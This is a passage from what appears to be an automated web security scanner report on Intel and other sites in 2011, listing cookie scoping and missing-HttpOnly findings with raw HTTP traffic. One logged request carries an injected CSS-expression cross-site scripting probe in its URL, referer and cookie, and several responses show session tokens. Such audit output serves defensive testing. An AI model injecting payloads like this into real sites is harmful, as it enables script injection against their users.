Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:08 GMT
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.52. http://www.flickr.com/apps/slideshow/show.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/slideshow/show.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/slideshow/show.swf HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT
Accept-Ranges: bytes
Content-Length: 118333
X-Served-By: www144.flickr.mud.yahoo.com
Cache-Control: private
Connection: close
Content-Type: application/x-shockwave-flash

CWS    ....x..|.P.....s..d..$I. Y...s.9G.E@.$9o..9l..D.9'.$9l`..7...z.;.W.W.U.7U6{.{z..Y..ou....|..z.....s...?.^8..p21.S.......s...=..pqq.ceuwwgq.`.w2ge...e}..........i.b..l...N.G.....N.....vT...F...O..
...[SNIP]...

11.53. http://www.flickr.com/photos/intelphotos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/intelphotos

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/intelphotos HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
X-Served-By: www40.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Intel Photos' Photostream</title>
   <meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

11.54. http://www.youtube.com/channelintel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /channelintel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channelintel HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:31 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/das_captcha?next=/channelintel
Content-Type: text/html; charset=utf-8
Connection: close


11.55. http://www.youtube.com/view_play_list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /view_play_list

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /view_play_list HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ
Content-Type: text/html; charset=utf-8
Connection: close


11.56. http://www.youtube.com/watch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT
Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ
Connection: close


11.57. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1 HTTP/1.1
Accept: */*
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www91.intel.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=78E12C4CBC31892852D8659ED77D7E3B.node7IPR; wa_visitId=%7Bf2a84205-6e62-e72c-945c-67c55cb850af%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957489568; s_lv_s=First%20Visit; cf=1; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:57:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
Location: http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&pccr=true&vidn=26A7000A05012477-60000107200B4F69&&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1
X-C: ms-4.3.1
Expires: Sat, 05 Feb 2011 01:57:40 GMT
Last-Modified: Mon, 07 Feb 2011 01:57:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 0
Content-Type: text/plain


12. Cookie without HttpOnly flag set
There are 159 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



12.1. http://appdeveloper.intel.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://appdeveloper.intel.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:17:40 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=99d10be2a8b5824058095ee73c009e9e; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...

12.2. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Summary

Severity:   Low
Confidence:   Firm
Host:   http://appdeveloper.intel.com
Path:   /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:17:40 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...

12.3. http://communities.intel.com/community/openportit/server

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/server

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/openportit/server HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=C3BB5A4A6127C798AA423278CD19252D.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 876
Content-Language: en-US
CacheHit: D=884319 t=1296947757183516
X-JSL: D=884325 t=1296947757183516
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.4. http://communities.intel.com/community/openportit/vproexpert

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.5. http://communities.intel.com/community/tech

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=A6A7D75900DB7F9498266317E36D34BE.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 269
Content-Language: en-US
CacheHit: D=278002 t=1296947755835805
X-JSL: D=278007 t=1296947755835805
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.6. http://communities.intel.com/community/tech/desktop

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/tech/desktop HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=655258FED1C8CE54639970DB6AAC28EB.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:54 GMT; Path=/
X-JAL: 111
Content-Language: en-US
CacheHit: D=120980 t=1296947753199224
X-JSL: D=120985 t=1296947753199224
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.7. http://communities.intel.com/index.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.jspa HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=84414FB0E56F8779A8C027A76AA897B4.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 497
Content-Language: en-US
CacheHit: D=506181 t=1296947752876810
X-JSL: D=506186 t=1296947752876810
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12.8. http://flesler.demos.com/jquery/scrollTo/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://flesler.demos.com
Path:   /jquery/scrollTo/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery/scrollTo/ HTTP/1.1
Host: flesler.demos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:59:27 GMT
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404 Not Found
Cache-Control: no-cache
Content-Length: 947
Set-Cookie: _display_manager_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--af8c11ce1971d13ddb232e31aa849f4ac245c1dc; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<
...[SNIP]...

12.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; 